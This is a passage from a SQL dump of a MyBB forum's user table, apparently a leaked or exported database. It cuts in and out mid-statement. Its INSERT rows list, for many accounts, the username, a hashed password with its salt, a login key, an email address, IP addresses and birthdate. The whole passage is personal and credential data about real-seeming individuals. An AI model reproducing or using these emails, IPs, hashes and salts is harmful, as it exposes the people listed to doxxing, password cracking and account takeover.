`icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('215', 'ThinkChange', '00afd1cad9951bce14c36d0270fa92e9', 'A3YLVrxt', '2eUfiQZFnbdazZ1Ga7dPKCFWLoDmvWetPG1lIyKmWamMy1o5nG', 'evil-elmo1996@hotmail.com', '0', '', '', '', '2', '', '0', '', '1349340669', '1349341043', '1349340669', '0', '', '0', '', '', '', '17-1-1996', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '121.7.73.219', '121.7.73.219', '2030520795', '2030520795', '', '374', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('216', 'o_o', '951ab578736cba34dc0cc03da3226bf0', 'tfyaPc1M', 'fDRnI2sjXujeWA9f7Tee2eWDGpaFrxDgXcpr6vR4zhOIPIwRCu', 'vmhmido@hotmail.com', '1', '', '', '', '2', '', '0', '', '1349363263', '1349365459', '1349363263', '1349363635', '', '0', '', '', '', '7-6-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '197.226.120.114', '197.226.120.114', '-975013774', '-975013774', '', '2200', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('217', 'IamV', 'acb084ba78d5214a1276cc78c39a3cda', 'th3nZEvo', 'TeNZzvkvlEEqVtT5eopERLwi7XQryVBoJvnTKxyR5N3OgMqFnt', 'odroo92@yahoo.com', '0', '', '', '', '2', '', '0', '', '1349386240', '1349386955', '1349386240', '0', '', '0', '', '', '', '4-7-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '203', '0', '0', '75.114.206.243', '75.114.206.243', '1265815283', '1265815283', '', '715', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('218', 'Armen', '87ff57ff14961f74fae04fd7749c20ed', 'B5HLJ3LI', '1iCYM255lMYjDctpF6Q2k7Y2NFcCv2bHgcHsnhtBSweIvAIXxZ', 'dalegacy16@aim.com', '0', '', '', '', '2', '', '0', '', '1349398815', '1349398828', '1349398815', '0', '', '0', '', '', '', '16-11-1993', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '67.86.115.130', '67.86.115.130', '1129739138', '1129739138', '', '13', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('223', 'StarZ', '13337b0385ccf82433fd5d7515f519ba', 'W4H3Hvsx', 'NTYqsFEqjb4LoPs3KGzDx18TY8qC2pRfM1tHf89X1ESFP38aG4', 'Aur0ras@hotmail.com', '6', '', '', '', '2', '', '0', '', '1349474580', '1350163790', '1349495972', '1349495972', '', '0', '', '', '', '1-1-1970', 'none', '', '1', '1', '0', '1', '1', '0', '2', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '174.127.99.156', '174.127.99.156', '-1367383140', '-1367383140', '', '1701', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '4', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('219', 'kaitlin', '5f178c1b060b8245a2244592b609b41a', 'J48MgEiI', 'gcuPDnviDI8eBlJbIWrmyOmp4MJDTlHKaCMZHYWhgB6Jn6MPvQ', 'leahrolls@hotmail.com', '2', '', '', '', '2', '', '0', '', '1349427949', '1349465993', '1349428043', '1349465888', '', '0', '', '', '', '7-11-1997', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.0.65.178', '94.0.65.178', '1577075122', '1577075122', '', '1110', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('220', 'Shinichi', 'eb903b5d9b577e66a32cce2862e5c2bc', '6sgoqQEi', 'wXDibA7RvyMo87zhdcYOTq7PEK472RSwwtB8EaOm8rsK81i847', 'kuduo.shinichi19@yahoo.com', '0', '', '', '', '2', '', '0', '', '1349440227', '1349440518', '1349440227', '0', '', '0', '', '', '', '24-3-1997', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '8', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '112.204.57.97', '112.204.57.97', '1892432225', '1892432225', '', '291', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('222', 'Exposé', 'b931c52bb9a4e4f123b3888b1ece7b1b', 'oZFVERVL', 'KKSQvoWcMRxkKWNNmXJ3K3iK6MwlK54vLjSlZ68wgUIWJ4mECZ', 'itsjinxer@gmail.com', '277', 'http://www.avatarsdb.com/avatars/cool_chick.gif?dateline=1349538927', '100|100', 'remote', '9', '17,13,21', '9', 'Don\'t feed the trolls! I love NXK', '1349462201', '1352814916', '1352800031', '1352814806', '', '0', '', '', '', '19-2-1991', 'all', '[align=center]Want to expose those who deserve to be exposed like scammers and cyber bullies. Check out http://notsoanonymo.us today![/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '18', '74.76.76.132', '74.67.7.114', '1246514308', '1245906802', '', '235017', '1', '36', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:4:{s:4:\"acid\";a:16:{i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:5:{s:4:\"acid\";i:1;s:4:\"name\";s:9:\"SE Legend\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_20_10_12_11_54_35.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}i:6;a:1:{s:11:\"showpostbit\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:22;a:5:{s:4:\"acid\";i:22;s:4:\"name\";s:7:\"Painter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_57_04.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:14;a:5:{s:4:\"acid\";i:14;s:4:\"name\";s:4:\"Swag\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:7;a:1:{s:11:\"showpostbit\";i:0;}i:8;a:1:{s:11:\"showpostbit\";i:0;}i:9;a:1:{s:11:\"showpostbit\";i:0;}i:10;a:1:{s:11:\"showpostbit\";i:0;}i:11;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:1:{s:11:\"showpostbit\";i:1;}}}', '29', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('275', 'Light dub', 'bd7b7d957eda5259308346f0f1a5ef78', 'KxwBWMcX', 'TMdzTRekLme8LJjAG9krFwqcI1GX4Om3r39xmpciaOSmhh3ic2', 'Frank_m_stewart@hotmail.com', '0', '', '', '', '2', '', '0', '', '1350548413', '1350550976', '1350548413', '0', '', '0', '', '', '', '10-10-1986', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '92.40.175.24', '92.40.175.24', '1546170136', '1546170136', '', '2563', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('237', 'Azwan81', '47a622a2c81501b4838265710cd2963b', 'Y5bF6vDh', 'E1BB786WelKMbxeQjRwRNRxWBmRCxjcph76KBafw1fQ78JoLlR', 'dsparda8225@gmail.com', '1', '', '', '', '2', '', '0', '', '1349699482', '1351348944', '1350124814', '1349706134', '', '0', '', '', '', '3-3-1980', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '203.92.138.166', '203.92.138.166', '-883127642', '-883127642', '', '8094', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('238', 'w00t', '1027b1068bf5b80dff8cb42b4a61ec85', 'mr2NN8AW', 'LYrySIoFCIrrXMx2toDgpOE7s7lu13Aaj71pozqF8Hi1PNGFqr', 'jamsport@sbcglobal.net', '0', '', '', '', '2', '', '0', '', '1349707619', '1349707765', '1349707619', '0', '', '0', '', '', '', '5-10-1990', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '108.221.21.146', '108.221.21.146', '1826428306', '1826428306', '', '146', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('240', 'Hardz', '5adb22c025fe5c3e650516c847c73a6d', 'bsrMnVDs', 'KpciGb49WArbxCZVsvpNvixSLrxVooYladtAEJjUFk2eIxlYYI', 'knowlezyy@gmail.com', '2', './uploads/avatars/avatar_240.png?dateline=1349728773', '100|100', 'upload', '2', '', '0', '', '1349725557', '1350179489', '1350164611', '1349729823', '', '0', '', '', '', '20-7-1984', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '86.135.61.58', '86.173.50.88', '1451703610', '1454191192', '', '7906', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('241', 'Constrain', '14ed26f3a2c6bba196f125e54a8e2c23', 'zBS1bRec', '2ppEba2uynOeCX58LrPvD7jIKTaeG41NxUkJ1zWozGfPzExOXt', 'schultz_logan@ymail.com', '1', '', '', '', '2', '', '0', '', '1349731310', '1350934535', '1350437938', '1349731685', '', '0', '', '', '', '3-9-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '108.18.121.45', '108.18.121.45', '1813149997', '1813149997', '', '1710', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('249', 'Ultimatum', '2683b26f36dab3cd8f483cfa60c21c5b', '3f47LTCV', '4jUw9mpzzFgzUcD6YRgXdXhDEqM9Yp8fceb4KfSHNCqvRCFw3A', 'lin29061@gmail.com', '3', './uploads/avatars/avatar_249.jpg?dateline=1349764724', '120|120', 'upload', '7', '', 